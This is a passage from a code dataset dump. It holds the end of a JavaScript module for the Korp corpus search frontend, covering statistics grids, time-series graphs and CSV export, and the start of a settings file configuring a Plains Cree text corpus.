0 : 1;\n const selType = $(`#kindOfFormat option:selected`).val();\n let dataDelimiter = `;`;\n if (selType === `tsv`) {\n dataDelimiter = `\\t`;\n }\n const cl = settings.corpusListing.subsetFactory(this.searchParams.corpora);\n\n let header = [];\n for (reduceVal of this.searchParams.reduceVals) {\n header.push(reduceVal);\n }\n\n header.push(util.getLocaleString(`stats_total`));\n header = header.concat(_.map(cl.corpora, `title`));\n\n const fmt = (what) => what.toString();\n\n const output = [];\n for (var row of this.data) {\n const outputRow = this.searchParams.reduceVals.map((reduceVal) => {\n if (row.rowId === 0) {\n return `Σ`;\n } else {\n return row[reduceVal].join(`,`);\n }\n });\n outputRow.push(fmt(row.total_value[selVal]));\n for (const corp of this.searchParams.corpora) {\n val = row[corp + `_value`][selVal];\n if (val) {\n outputRow.push(fmt(val));\n } else {\n outputRow.push(`0`);\n }\n }\n output.push(outputRow);\n }\n\n const csv = new CSV(output, {\n header,\n delimiter: dataDelimiter,\n });\n\n const csvstr = csv.encode();\n\n const blob = new Blob([csvstr], { type: `text/${selType}` });\n const csvUrl = URL.createObjectURL(blob);\n\n $(`#exportButton`, this.$result).attr({\n download: `export.${selType}`,\n href: csvUrl,\n });\n }\n\n makeRequest(cqp) {\n const grid = document.getElementById(`myGrid`);\n grid.innerHTML = ``;\n\n this.s.hasResult = false;\n if (!this.s.shouldSearch()) {\n return;\n }\n\n this.s.hasResult = true;\n\n if (currentMode === `parallel`) {\n cqp = cqp.replace(/\\:LINKED_CORPUS.*/, ``);\n }\n\n if (this.proxy.hasPending()) {\n this.ignoreAbort = true;\n } else {\n this.ignoreAbort = false;\n this.resetView();\n }\n\n this.showPreloader();\n this.proxy\n .makeRequest(cqp, (...args) => this.onProgress(...(args || [])))\n .then(\n (...args) => {\n const [data, columns, searchParams] = args[0];\n safeApply(this.s, () => {\n return this.hidePreloader();\n });\n this.data = data;\n this.searchParams = searchParams;\n return this.renderResult(columns, data);\n },\n (textStatus, err) => {\n c.log(`fail`, arguments);\n c.log(\n `stats fail`,\n this.s.$parent.loading,\n _.map(this.proxy.pendingRequests, (item) => item.readyState),\n );\n if (this.ignoreAbort) {\n c.log(`stats ignoreabort`);\n return;\n }\n safeApply(this.s, () => {\n this.hidePreloader();\n if (textStatus === `abort`) {\n this.s.aborted = true;\n } else {\n this.resultError(err);\n }\n });\n },\n );\n }\n\n getSelectedRows() {\n if (this.grid) {\n return this.grid.getSelectedRows().sort();\n } else {\n return [];\n }\n }\n\n getDataAt(rowIx) {\n return this.grid.getData()[rowIx];\n }\n\n showGenerateExport() {\n $(`#exportButton`).hide();\n $(`#generateExportButton`).show();\n }\n\n hideGenerateExport() {\n $(`#exportButton`).show();\n $(`#generateExportButton`).hide();\n }\n\n renderResult(columns, data) {\n if (this.isActive()) {\n this.s.$root.jsonUrl = this.proxy.prevUrl;\n }\n\n this.showGenerateExport();\n\n const refreshHeaders = () =>\n $(`.localized-header .slick-column-name`)\n .not(`[rel^=localize]`)\n .each(function () {\n return $(this).localeKey($(this).text());\n });\n\n this.gridData = data;\n const resultError = super.renderResult(data);\n if (resultError === false) {\n return;\n }\n\n if (data[0].total_value.absolute === 0) {\n safeApply(this.s, () => {\n this.s.no_hits = true;\n });\n return;\n }\n\n const checkboxSelector = new Slick.CheckboxSelectColumn({\n cssClass: `slick-cell-checkboxsel`,\n });\n\n columns = 
[checkboxSelector.getColumnDefinition()].concat(columns);\n\n const grid = new Slick.Grid($(`#myGrid`), data, columns, {\n enableCellNavigation: false,\n enableColumnReorder: false,\n forceFitColumns: false,\n });\n\n grid.setSelectionModel(new Slick.RowSelectionModel({ selectActiveRow: false }));\n grid.registerPlugin(checkboxSelector);\n this.grid = grid;\n this.grid.autosizeColumns();\n\n this.s.totalNumberOfRows = this.grid.getDataLength();\n\n grid.onSort.subscribe((e, args) => {\n if (this.doSort) {\n const sortColumns = grid.getSortColumns()[0];\n this.sortColumn = sortColumns.columnId;\n this.sortAsc = sortColumns.sortAsc;\n const { sortCol } = args;\n data.sort(function (a, b) {\n let x, y;\n if (a.id === `row_total`) {\n return -1;\n }\n if (b.id === `row_total`) {\n return -1;\n }\n if (sortCol.field === `hit_value`) {\n x = a[sortColumns.columnId];\n y = b[sortColumns.columnId];\n } else {\n x = a[sortCol.field][0] || 0;\n y = b[sortCol.field][0] || 0;\n }\n let ret = x === y ? 0 : x > y ? 1 : -1;\n if (!args.sortAsc) {\n ret *= -1;\n }\n return ret;\n });\n\n grid.setData(data);\n grid.updateRowCount();\n return grid.render();\n } else {\n if (this.sortColumn) {\n return grid.setSortColumn(this.sortColumn, this.sortAsc);\n } else {\n return grid.setSortColumns([]);\n }\n }\n });\n\n grid.onColumnsResized.subscribe((e, args) => {\n this.doSort = false; // if sort event triggered, sorting will not occur\n this.resizeGrid(false);\n return e.stopImmediatePropagation();\n });\n\n grid.onHeaderClick.subscribe((e, args) => {\n this.doSort = true; // enable sorting again, resize is done\n return e.stopImmediatePropagation();\n });\n\n grid.onHeaderCellRendered.subscribe((e, args) => refreshHeaders());\n\n refreshHeaders();\n $(`.slick-row:first input`, this.$result).click();\n $(window).trigger(`resize`);\n\n $.when(window.timeDeferred).then(() => {\n safeApply(this.s, () => {\n this.updateGraphBtnState();\n });\n });\n\n this.s.getGeoAttributes(this.searchParams.corpora);\n\n safeApply(this.s, () => {\n this.hidePreloader();\n });\n }\n\n updateGraphBtnState() {\n this.s.graphEnabled = true;\n const cl = settings.corpusListing.subsetFactory(this.searchParams.corpora);\n if (!_.compact(cl.getTimeInterval()).length) {\n this.s.graphEnabled = false;\n }\n }\n\n resizeGrid(resizeColumns) {\n let width;\n let height = 0;\n $(`.slick-row`).each(function () {\n height += $(this).outerHeight(true);\n });\n $(`#myGrid:visible.slick-viewport`).height(height);\n\n // adding 20 px to width if vertical scrollbar appears\n if ((this.gridData != null ? this.gridData.length : undefined) * 25 >= height) {\n width = 20;\n } else {\n width = 0;\n }\n\n $(`.slick-header-column`).each(function () {\n width += $(this).outerWidth(true);\n });\n if (width > $(window).width() - 40) {\n width = $(window).width() - 40;\n }\n $(`#myGrid:visible.slick-viewport`).width(width);\n\n if (this.grid != null) {\n this.grid.resizeCanvas();\n if (resizeColumns) {\n this.grid.autosizeColumns();\n }\n }\n return this.grid != null ? 
this.grid.invalidate() : undefined;\n }\n\n showPieChart(rowId) {\n let statsSwitchInstance;\n this.pieChartCurrentRowId = rowId;\n\n const getDataItems = (rowId, valueType) => {\n const dataItems = [];\n if (valueType === `relative`) {\n valueType = 1;\n } else {\n valueType = 0;\n }\n for (const row of this.data) {\n if (row.rowId === rowId) {\n for (const corpus of this.searchParams.corpora) {\n const freq = row[corpus + `_value`][valueType];\n dataItems.push({\n value: freq,\n caption:\n settings.corpora[corpus.toLowerCase()].title +\n `: ` +\n util.formatDecimalString(freq.toString()),\n shape_id: rowId,\n });\n }\n break;\n }\n }\n return dataItems;\n };\n\n $(`#dialog`).remove();\n\n const relHitsString = util.getLocaleString(`statstable_relfigures_hits`);\n $(`<div id='dialog' />`)\n .appendTo(`body`)\n .append(\n `<div id=\"pieDiv\"><br/><div id=\"statistics_switch\" style=\"text-align:center\">\n <a href=\"javascript:\" rel=\"localize[statstable_relfigures]\" data-mode=\"relative\">Relativa frekvenser</a>\n <a href=\"javascript:\" rel=\"localize[statstable_absfigures]\" data-mode=\"absolute\">Absoluta frekvenser</a>\n </div>\n <div id=\"chartFrame\" style=\"height:380\"></div>\n <p id=\"hitsDescription\" style=\"text-align:center\" rel=\"localize[statstable_absfigures_hits]\">${relHitsString}</p>\n </div>`,\n )\n .dialog({\n width: 400,\n height: 500,\n close() {\n return $(`#pieDiv`).remove();\n },\n })\n .css(`opacity`, 0)\n .parent()\n .find(`.ui-dialog-title`)\n .localeKey(`statstable_hitsheader_lemgram`);\n\n $(`#dialog`).fadeTo(400, 1);\n $(`#dialog`).find(`a`).blur(); // Prevents the focus of the first link in the \"dialog\"\n\n const stats2Instance = $(`#chartFrame`).pie_widget({\n container_id: `chartFrame`,\n data_items: getDataItems(rowId, `relative`),\n });\n statsSwitchInstance = $(`#statistics_switch`).radioList({\n change: () => {\n let loc;\n const typestring = statsSwitchInstance.radioList(`getSelected`).attr(`data-mode`);\n stats2Instance.pie_widget(\n `newData`,\n getDataItems(this.pieChartCurrentRowId, typestring),\n );\n if (typestring === `absolute`) {\n loc = `statstable_absfigures_hits`;\n } else {\n loc = `statstable_relfigures_hits`;\n }\n return $(`#hitsDescription`).localeKey(loc);\n },\n selected: `relative`,\n });\n }\n\n onentry() {\n // workaround for bug in slickgrid\n // slickgrid should add this automatically, but doesn't\n $(`#myGrid`).css(`position`, `relative`);\n\n super.onentry();\n $(window).trigger(`resize`);\n }\n\n resetView() {\n super.resetView();\n $(`myGrid`).empty();\n $(`#exportStatsSection`).show();\n $(`#exportButton`).attr({\n download: null,\n href: null,\n });\n this.s.no_hits = false;\n this.s.aborted = false;\n }\n};\n\nview.GraphResults = class GraphResults extends BaseResults {\n constructor(tabSelector, resultSelector, scope) {\n super(tabSelector, resultSelector, scope);\n\n this.validZoomLevels = [`year`, `month`, `day`, `hour`, `minute`, `second`];\n this.granularities = {\n year: `y`,\n month: `m`,\n day: `d`,\n hour: `h`,\n minute: `n`,\n second: `s`,\n };\n\n this.zoom = `year`;\n this.proxy = new model.GraphProxy();\n\n const [from, to] = settings.corpusListing.getMomentInterval();\n\n this.checkZoomLevel(from, to, true);\n\n $(`.chart`, this.$result).on(`click`, (event) => {\n const target = $(`.chart`, this.$result);\n const val = $(`.detail .x_label > span`, target).data(`val`);\n let cqp = $(`.detail .item.active > span`, target).data(`cqp`);\n\n if (cqp) {\n let timecqp;\n cqp = 
CQP.expandOperators(decodeURIComponent(cqp));\n const m = moment(val * 1000);\n\n const datefrom = moment(m).startOf(this.zoom).format(`YYYYMMDD`);\n const dateto = moment(m).endOf(this.zoom).format(`YYYYMMDD`);\n if (this.validZoomLevels.indexOf(this.zoom) < 3) {\n // year, month, day\n timecqp = `[(int(_.text_datefrom) >= ${datefrom} & int(_.text_dateto) <= ${dateto}) |\n (int(_.text_datefrom) <= ${datefrom} & int(_.text_dateto) >= ${dateto})\n ]`;\n } else {\n // hour, minute, second\n const timefrom = moment(m).startOf(this.zoom).format(`HHmmss`);\n const timeto = moment(m).endOf(this.zoom).format(`HHmmss`);\n timecqp = `[(int(_.text_datefrom) = ${datefrom} &\n int(_.text_timefrom) >= ${timefrom} &\n int(_.text_dateto) <= ${dateto} &\n int(_.text_timeto) <= ${timeto}) |\n ((int(_.text_datefrom) < ${datefrom} |\n (int(_.text_datefrom) = ${datefrom} & int(_.text_timefrom) <= ${timefrom})\n ) &\n (int(_.text_dateto) > ${dateto} |\n (int(_.text_dateto) = ${dateto} & int(_.text_timeto) >= ${timeto})\n ))]`;\n }\n\n const n_tokens = this.s.data.cqp.split(`]`).length - 2;\n\n timecqp = [timecqp].concat(_.map(_.range(0, n_tokens), () => `[]`)).join(` `);\n\n const opts = {};\n opts.ajaxParams = {\n start: 0,\n end: 24,\n corpus: this.s.data.corpusListing.stringifySelected(),\n cqp: this.s.data.cqp,\n cqp2: timecqp,\n expand_prequeries: false,\n };\n\n safeApply(this.s.$root, () => {\n this.s.$root.kwicTabs.push({ queryParams: opts });\n });\n }\n });\n }\n\n drawPreloader(from, to) {\n let left, width;\n if (this.graph) {\n left = this.graph.x(from.unix());\n width = this.graph.x(to.unix()) - left;\n } else {\n left = 0;\n width = `100%`;\n }\n\n $(`.preloader`, this.$result).css({\n left,\n width,\n });\n }\n\n setZoom(zoom, from, to) {\n this.zoom = zoom;\n const fmt = `YYYYMMDDHHmmss`;\n\n this.drawPreloader(from, to);\n this.proxy.granularity = this.granularities[zoom];\n this.makeRequest(\n this.s.data.cqp,\n this.s.data.subcqps,\n this.s.data.corpusListing,\n this.s.data.labelMapping,\n this.s.data.showTotal,\n from.format(fmt),\n to.format(fmt),\n );\n }\n\n checkZoomLevel(from, to, forceSearch) {\n if (from == null) {\n const domain = this.graph.renderer.domain();\n from = moment.unix(domain.x[0]);\n to = moment.unix(domain.x[1]);\n }\n\n const oldZoom = this.zoom;\n\n const idealNumHits = 1000;\n const newZoom = _.minBy(this.validZoomLevels, function (zoom) {\n const nPoints = to.diff(from, zoom);\n return Math.abs(idealNumHits - nPoints);\n });\n\n if ((newZoom && oldZoom !== newZoom) || forceSearch) {\n this.setZoom(newZoom, from, to);\n }\n }\n\n parseDate(zoom, time) {\n switch (zoom) {\n case `year`:\n return moment(time, `YYYY`);\n case `month`:\n return moment(time, `YYYYMM`);\n case `day`:\n return moment(time, `YYYYMMDD`);\n case `hour`:\n return moment(time, `YYYYMMDDHH`);\n case `minute`:\n return moment(time, `YYYYMMDDHHmm`);\n case `second`:\n return moment(time, `YYYYMMDDHHmmss`);\n }\n }\n\n fillMissingDate(data) {\n const dateArray = _.map(data, `x`);\n const min = _.minBy(dateArray, (mom) => mom.toDate());\n const max = _.maxBy(dateArray, (mom) => mom.toDate());\n\n min.startOf(this.zoom);\n max.endOf(this.zoom);\n\n const n_diff = moment(max).diff(min, this.zoom);\n\n const momentMapping = _.fromPairs(\n _.map(data, (item) => {\n const mom = moment(item.x);\n mom.startOf(this.zoom);\n return [mom.unix(), item.y];\n }),\n );\n\n const newMoments = [];\n for (const i of _.range(0, n_diff + 1)) {\n var lastYVal;\n const newMoment = moment(min).add(i, this.zoom);\n\n 
const maybeCurrent = momentMapping[newMoment.unix()];\n if (typeof maybeCurrent !== `undefined`) {\n lastYVal = maybeCurrent;\n } else {\n newMoments.push({ x: newMoment, y: lastYVal });\n }\n }\n\n return [].concat(data, newMoments);\n }\n\n getSeriesData(data, showSelectedCorporasStartDate, zoom) {\n delete data[``];\n // TODO: getTimeInterval should take the corpora of this parent tab instead of the global ones.\n // const [firstVal, lastVal] = settings.corpusListing.getMomentInterval()\n let output = [];\n for (const [x, y] of _.toPairs(data)) {\n const mom = this.parseDate(this.zoom, x);\n output.push({ x: mom, y });\n }\n\n // if (not hasFirstValue) and showSelectedCorporasStartDate\n // if showSelectedCorporasStartDate # Don't remove first value for now\n // output.push {x : firstVal, y:0}\n\n // const prettyDate = item => moment(item.x).format(\"YYYYMMDD:HHmmss\")\n\n output = this.fillMissingDate(output);\n output = output.sort((a, b) => a.x.unix() - b.x.unix());\n\n for (const tuple of output) {\n tuple.x = tuple.x.unix();\n tuple.zoom = zoom;\n }\n\n return output;\n }\n\n hideNthTick(graphDiv) {\n return $(`.x_tick:visible`, graphDiv)\n .hide()\n .filter((n) => (n % 2 || n % 3 || n % 5) === 0)\n .show();\n }\n\n updateTicks() {\n const ticks = $(`.chart .title:visible`, this.$result);\n const firstTick = ticks.eq(0);\n const secondTick = ticks.eq(1);\n\n const margin = 5;\n\n if (!firstTick.length || !secondTick.length) {\n return;\n }\n if (firstTick.offset().left + firstTick.width() + margin > secondTick.offset().left) {\n this.hideNthTick($(`.chart`, this.$result));\n return this.updateTicks();\n }\n }\n\n getNonTime() {\n // TODO: move settings.corpusListing.selected to the subview\n const non_time = _.reduce(\n _.map(settings.corpusListing.selected, `non_time`),\n (a, b) => (a || 0) + (b || 0),\n 0,\n );\n const sizelist = _.map(settings.corpusListing.selected, (item) => Number(item.info.Size));\n const totalsize = _.reduce(sizelist, (a, b) => a + b);\n return (non_time / totalsize) * 100;\n }\n\n getEmptyIntervals(data) {\n const intervals = [];\n let i = 0;\n\n while (i < data.length) {\n let item = data[i];\n\n if (item.y === null) {\n const interval = [_.clone(item)];\n let breaker = true;\n while (breaker) {\n i++;\n item = data[i];\n if ((item != null ? 
item.y : undefined) === null) {\n interval.push(_.clone(item));\n } else {\n intervals.push(interval);\n breaker = false;\n }\n }\n }\n i++;\n }\n\n return intervals;\n }\n\n drawIntervals(graph) {\n const { emptyIntervals } = graph.series[0];\n this.s.hasEmptyIntervals = emptyIntervals.length;\n const obj = graph.renderer.domain();\n let [from, to] = obj.x;\n\n const unitSpan = moment.unix(to).diff(moment.unix(from), this.zoom);\n const unitWidth = graph.width / unitSpan;\n\n $(`.empty_area`, this.$result).remove();\n for (const list of emptyIntervals) {\n const max = _.maxBy(list, `x`);\n const min = _.minBy(list, `x`);\n from = graph.x(min.x);\n to = graph.x(max.x);\n\n $(`<div>`, { class: `empty_area` })\n .css({\n left: from - unitWidth / 2,\n width: to - from + unitWidth,\n })\n .appendTo(graph.element);\n }\n }\n\n setBarMode() {\n if ($(`.legend .line`, this.$result).length > 1) {\n $(`.legend li:last:not(.disabled) .action`, this.$result).click();\n if (\n _.every(_.map($(`.legend .line`, this.$result), (item) => $(item).is(`.disabled`)))\n ) {\n $(`.legend li:first .action`, this.$result).click();\n }\n }\n }\n\n setLineMode() {}\n\n setTableMode(series) {\n $(`.chart,.legend`, this.$result).hide();\n $(`.time_table`, this.$result.parent()).show();\n const nRows = series.length || 2;\n let h = nRows * 2 + 4;\n h = Math.min(h, 40);\n $(`.time_table:visible`, this.$result).height(`${h}.1em`);\n if (this.time_grid != null) {\n this.time_grid.resizeCanvas();\n }\n $(`.exportTimeStatsSection`, this.$result).show();\n\n return $(`.exportTimeStatsSection .btn.export`, this.$result).click(() => {\n const selVal = $(`.timeKindOfData option:selected`, this.$result).val();\n const selType = $(`.timeKindOfFormat option:selected`, this.$result).val();\n const dataDelimiter = selType === `TSV` ? `\\t` : `;`;\n\n const header = [util.getLocaleString(`stats_hit`)];\n\n for (const cell of series[0].data) {\n const stampformat = this.zoomLevelToFormat(cell.zoom);\n header.push(moment(cell.x * 1000).format(stampformat));\n }\n\n const output = [header];\n\n for (const row of series) {\n const cells = [row.name === `Σ` ? 
`Σ` : row.name];\n for (const cell of row.data) {\n if (selVal === `relative`) {\n cells.push(cell.y);\n } else {\n const i = _.sortedIndexOf(_.map(row.abs_data, `x`), cell.x);\n cells.push(row.abs_data[i].y);\n }\n }\n output.push(cells);\n }\n\n const csv = new CSV(output, {\n delimiter: dataDelimiter,\n });\n\n const csvstr = csv.encode();\n const blob = new Blob([csvstr], { type: `text/${selType}` });\n const csvUrl = URL.createObjectURL(blob);\n\n const a = document.createElement(`a`);\n a.href = csvUrl;\n a.download = `export.${selType}`;\n a.style.display = `none`;\n document.body.appendChild(a);\n a.click();\n document.body.removeChild(a);\n window.URL.revokeObjectURL(csvUrl);\n });\n }\n\n zoomLevelToFormat(zoom) {\n const stampFormats = {\n second: `YYYY-MM-DD hh:mm:ss`,\n minute: `YYYY-MM-DD hh:mm`,\n hour: `YYYY-MM-DD hh`,\n day: `YYYY-MM-DD`,\n month: `YYYY-MM`,\n year: `YYYY`,\n };\n return stampFormats[zoom];\n }\n\n renderTable(series) {\n const time_table_data = [];\n const time_table_columns_intermediate = {};\n for (const row of series) {\n const new_time_row = { label: row.name };\n for (const item of row.data) {\n const stampformat = this.zoomLevelToFormat(item.zoom);\n const timestamp = moment(item.x * 1000).format(stampformat); // this needs to be fixed for other resolutions\n time_table_columns_intermediate[timestamp] = {\n name: timestamp,\n field: timestamp,\n formatter(row, cell, value, columnDef, dataContext) {\n const loc = {\n sv: `sv-SE`,\n en: `gb-EN`,\n }[$(`body`).scope().lang];\n const fmt = function (valTup) {\n if (typeof valTup[0] === `undefined`) {\n return ``;\n }\n return (\n `<span>` +\n `<span class='relStat'>` +\n Number(valTup[1].toFixed(1)).toLocaleString(loc) +\n `</span> ` +\n `<span class='absStat'>(` +\n valTup[0].toLocaleString(loc) +\n `)</span> ` +\n `<span>`\n );\n };\n return fmt(value);\n },\n };\n const i = _.sortedIndexOf(_.map(row.abs_data, `x`), item.x);\n new_time_row[timestamp] = [item.y, row.abs_data[i].y];\n }\n time_table_data.push(new_time_row);\n }\n // Sort columns\n const time_table_columns = [\n {\n name: `Hit`,\n field: `label`,\n formatter(row, cell, value, columnDef, dataContext) {\n return value;\n },\n },\n ];\n for (const key of _.keys(time_table_columns_intermediate).sort()) {\n time_table_columns.push(time_table_columns_intermediate[key]);\n }\n\n const time_grid = new Slick.Grid(\n $(`.time_table`, this.$result),\n time_table_data,\n time_table_columns,\n {\n enableCellNavigation: false,\n enableColumnReorder: false,\n forceFitColumns: false,\n },\n );\n $(`.time_table`, this.$result).width(`100%`);\n this.time_grid = time_grid;\n }\n\n makeSeries(data, cqp, labelMapping, zoom) {\n let color, series;\n const [from, to] = CQP.getTimeInterval(CQP.parse(cqp)) || [null, null];\n const showSelectedCorporasStartDate = !from;\n if (_.isArray(data.combined)) {\n const palette = new Rickshaw.Color.Palette(`colorwheel`);\n series = [];\n for (const item of data.combined) {\n color = palette.color();\n series.push({\n data: this.getSeriesData(item.relative, showSelectedCorporasStartDate, zoom),\n color,\n name: item.cqp ? 
this.s.data.labelMapping[item.cqp] : `Σ`,\n cqp: item.cqp || cqp,\n abs_data: this.getSeriesData(\n item.absolute,\n showSelectedCorporasStartDate,\n zoom,\n ),\n });\n }\n } else {\n series = [\n {\n data: this.getSeriesData(\n data.combined.relative,\n showSelectedCorporasStartDate,\n zoom,\n ),\n color: `steelblue`,\n name: `Σ`,\n cqp,\n abs_data: this.getSeriesData(\n data.combined.absolute,\n showSelectedCorporasStartDate,\n zoom,\n ),\n },\n ];\n }\n Rickshaw.Series.zeroFill(series);\n\n const emptyIntervals = this.getEmptyIntervals(series[0].data);\n series[0].emptyIntervals = emptyIntervals;\n\n for (const s of series) {\n s.data = _.filter(s.data, (item) => item.y !== null);\n s.abs_data = _.filter(s.abs_data, (item) => item.y !== null);\n }\n\n return series;\n }\n\n spliceData(newSeries) {\n for (let seriesIndex = 0; seriesIndex < this.graph.series.length; seriesIndex++) {\n const seriesObj = this.graph.series[seriesIndex];\n const first = newSeries[seriesIndex].data[0].x;\n const last = _.last(newSeries[seriesIndex].data).x;\n let startSplice = false;\n let from = 0;\n let n_elems = seriesObj.data.length + newSeries[seriesIndex].data.length;\n for (let i = 0; i < seriesObj.data.length; i++) {\n var j;\n const { x } = seriesObj.data[i];\n if (x >= first && !startSplice) {\n startSplice = true;\n from = i;\n j = 0;\n }\n if (startSplice) {\n if (x >= last) {\n n_elems = j + 1;\n break;\n }\n j++;\n }\n }\n\n seriesObj.data.splice(from, n_elems, ...newSeries[seriesIndex].data);\n seriesObj.abs_data.splice(from, n_elems, ...newSeries[seriesIndex].abs_data);\n }\n }\n\n previewPanStop() {\n const visibleData = this.graph.stackData();\n\n const count = _.countBy(visibleData[0], (coor) => coor.zoom);\n\n const grouped = _.groupBy(visibleData[0], `zoom`);\n\n for (const zoomLevel in grouped) {\n const points = grouped[zoomLevel];\n if (zoomLevel !== this.zoom) {\n const from = moment.unix(points[0].x);\n from.startOf(this.zoom);\n const to = moment.unix(_.last(points).x);\n to.endOf(this.zoom);\n this.setZoom(this.zoom, from, to);\n }\n }\n }\n\n renderGraph(data, cqp, labelMapping, currentZoom, showTotal) {\n let series;\n\n const done = () => {\n this.hidePreloader();\n safeApply(this.s, () => {\n this.s.loading = false;\n });\n\n return $(window).trigger(`resize`);\n };\n\n if (data.ERROR) {\n this.resultError(data);\n return;\n }\n\n if (this.graph) {\n series = this.makeSeries(data, cqp, labelMapping, currentZoom);\n this.spliceData(series);\n this.drawIntervals(this.graph);\n this.graph.render();\n done();\n return;\n }\n\n const nontime = this.getNonTime();\n\n if (nontime) {\n $(`.non_time`, this.$result)\n .empty()\n .text(nontime.toFixed(2) + `%`)\n .parent()\n .localize();\n } else {\n $(`.non_time_div`, this.$result).hide();\n }\n\n series = this.makeSeries(data, cqp, labelMapping, currentZoom);\n\n const graph = new Rickshaw.Graph({\n element: $(`.chart`, this.$result).empty().get(0),\n renderer: `line`,\n interpolation: `linear`,\n series,\n padding: {\n top: 0.1,\n right: 0.01,\n },\n });\n let width = $(`.tab-pane`).width();\n graph.setSize({ width });\n graph.render();\n window._graph = this.graph = graph;\n\n this.drawIntervals(graph);\n\n $(window).on(\n `resize`,\n _.throttle(() => {\n if (this.$result.is(`:visible`)) {\n width = $(`.tab-pane`).width();\n graph.setSize();\n this.preview.configure({ width });\n this.preview.render();\n return graph.render();\n }\n }, 200),\n );\n\n $(`.form_switch`, this.$result).click((event) => {\n const val = this.s.mode;\n for 
(const cls of this.$result.attr(`class`).split(` `)) {\n if (cls.match(/^form-/)) {\n this.$result.removeClass(cls);\n }\n }\n this.$result.addClass(`form-${val}`);\n $(`.chart,.legend`, this.$result.parent()).show();\n $(`.time_table`, this.$result.parent()).hide();\n if (val === `bar`) {\n this.setBarMode();\n } else if (val === `table`) {\n this.renderTable(series);\n this.setTableMode(series);\n }\n\n if (val !== `table`) {\n graph.setRenderer(val);\n graph.render();\n $(`.exportTimeStatsSection`, this.$result).hide();\n }\n });\n\n const legend = new Rickshaw.Graph.Legend({\n element: $(`.legend`, this.$result).get(0),\n graph,\n });\n\n const shelving = new Rickshaw.Graph.Behavior.Series.Toggle({\n graph,\n legend,\n });\n\n if (!showTotal && $(`.legend .line`, this.$result).length > 1) {\n $(`.legend .line:last .action`, this.$result).click();\n }\n\n const hoverDetail = new Rickshaw.Graph.HoverDetail({\n graph,\n xFormatter: (x) => {\n const m = moment.unix(String(x));\n\n return `<span data-val='${x}'>${m.format(`YYYY-MM-DD HH:mm:ss`)}</span>`;\n },\n\n yFormatter(y) {\n const val = util.formatDecimalString(y.toFixed(2), false, true, true);\n\n return (\n `<br><span rel='localize[rel_hits_short]'>${util.getLocaleString(\n `rel_hits_short`,\n )}</span> ` + val\n );\n },\n formatter(series, x, y, formattedX, formattedY, d) {\n let abs_y;\n const i = _.sortedIndexOf(_.map(series.data, `x`), x);\n try {\n abs_y = series.abs_data[i].y;\n } catch (e) {\n c.log(`i`, i, x);\n }\n\n const rel = series.name + `: ` + formattedY;\n return `<span data-cqp=\"${encodeURIComponent(series.cqp)}\">\n ${rel}\n <br>\n ${util.getLocaleString(`abs_hits_short`)}: ${abs_y}\n </span>`;\n },\n });\n\n // [first, last] = settings.corpusListing.getTimeInterval()\n // [firstVal, lastVal] = settings.corpusListing.getMomentInterval()\n\n // TODO: fix decade again\n // timeunit = if last - first > 100 then \"decade\" else @zoom\n\n const toDate = (sec) => moment(sec * 1000).toDate();\n\n const time = new Rickshaw.Fixtures.Time();\n const old_ceil = time.ceil;\n time.ceil = (time, unit) => {\n if (unit.name === `decade`) {\n const out = Math.ceil(time / unit.seconds) * unit.seconds;\n const mom = moment(out * 1000);\n if (mom.date() === 31) {\n mom.add(`day`, 1);\n }\n return mom.unix();\n } else {\n return old_ceil(time, unit);\n }\n };\n\n const xAxis = new Rickshaw.Graph.Axis.Time({\n graph,\n });\n // timeUnit: time.unit(\"month\") # TODO: bring back decade\n // timeFixture: new Rickshaw.Fixtures.Time()\n\n this.preview = new Rickshaw.Graph.RangeSlider.Preview({\n graph,\n element: $(`.preview`, this.$result).get(0),\n });\n\n $(`body`).on(`mouseup`, `.preview .middle_handle`, () => {\n return this.previewPanStop();\n });\n\n $(`body`).on(`mouseup`, `.preview .left_handle, .preview .right_handle`, () => {\n if (!this.s.loading) {\n return this.previewPanStop();\n }\n });\n\n window._xaxis = xAxis;\n\n const old_render = xAxis.render;\n xAxis.render = _.throttle(\n () => {\n old_render.call(xAxis);\n this.drawIntervals(graph);\n return this.checkZoomLevel();\n },\n\n 20,\n );\n\n xAxis.render();\n\n const yAxis = new Rickshaw.Graph.Axis.Y({\n graph,\n });\n\n yAxis.render();\n\n done();\n }\n\n async makeRequest(cqp, subcqps, corpora, labelMapping, showTotal, from, to) {\n this.s.loading = true;\n if (!window.Rickshaw) {\n var rickshawPromise = import(/* webpackChunkName: \"rickshaw\" */ `rickshaw`);\n }\n this.showPreloader();\n const currentZoom = this.zoom;\n const reqPromise = this.proxy\n 
.makeRequest(cqp, subcqps, corpora.stringifySelected(), from, to)\n .progress((data) => {\n return this.onProgress(data);\n });\n\n try {\n var [rickshawModule, graphData] = await Promise.all([\n rickshawPromise || Rickshaw,\n reqPromise,\n ]);\n } catch (e) {\n c.error(`graph crash`, e);\n this.resultError(data);\n this.s.loading = false;\n }\n window.Rickshaw = rickshawModule;\n this.renderGraph(graphData, cqp, labelMapping, currentZoom, showTotal);\n }\n};\n"
},
{
"alpha_fraction": 0.6738197207450867,
"alphanum_fraction": 0.6762722134590149,
"avg_line_length": 33.70212936401367,
"blob_id": "68aba3b573b011800f34daf5c500247afc883bc3",
"content_id": "b8f66e58968196038dd20614066ace261d051b51",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1633,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 47,
"path": "/app/modes/default_mode.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "settings.corpora = {};\nsettings.corporafolders = {};\n\nsettings.corporafolders.crk = {\n // corpora included in this folder\n contents: [`wolfart_ahenakew`],\n // description for this folder\n // description: `A description,`\n // appears in the corpus selection dropdown for this folder\n title: `nêhiyawêwin (Plains Cree) texts`,\n};\n\n/*\n * PRESELECTED CORPORA\n * Folders will be expanded to all corpora.\n * Optionally prefix folders with __ , which will be ignored.\n */\nsettings.preselectedCorpora = [`wolfart_ahenakew`];\n\nsettings.corpora.wolfart_ahenakew = {\n\n id: `wolfart_ahenakew`,\n title: `Ahenakew-Wolfart Texts`, // displayed in info box under \"Corpus\"\n description: `Plains Cree texts compiled and edited by H. C. Wolfart and Freda Ahenakew`,\n within: spWithin, // from common.js; sp = sentence/paragraph\n context: spContext, // from common.js; sp = sentence/paragraph\n\n // attributes are displayed in the info box under \"Word attributes\"\n attributes: {\n dep: attrs.dep,\n gloss: attrs.gloss, // This may need to be specified some/elsewhere, as it is ALTLab-specific\n lemma: attrs.baseform,\n msd: attrs.msd,\n },\n\n // structural attributes are displayed in the info box under \"Text attributes\"\n 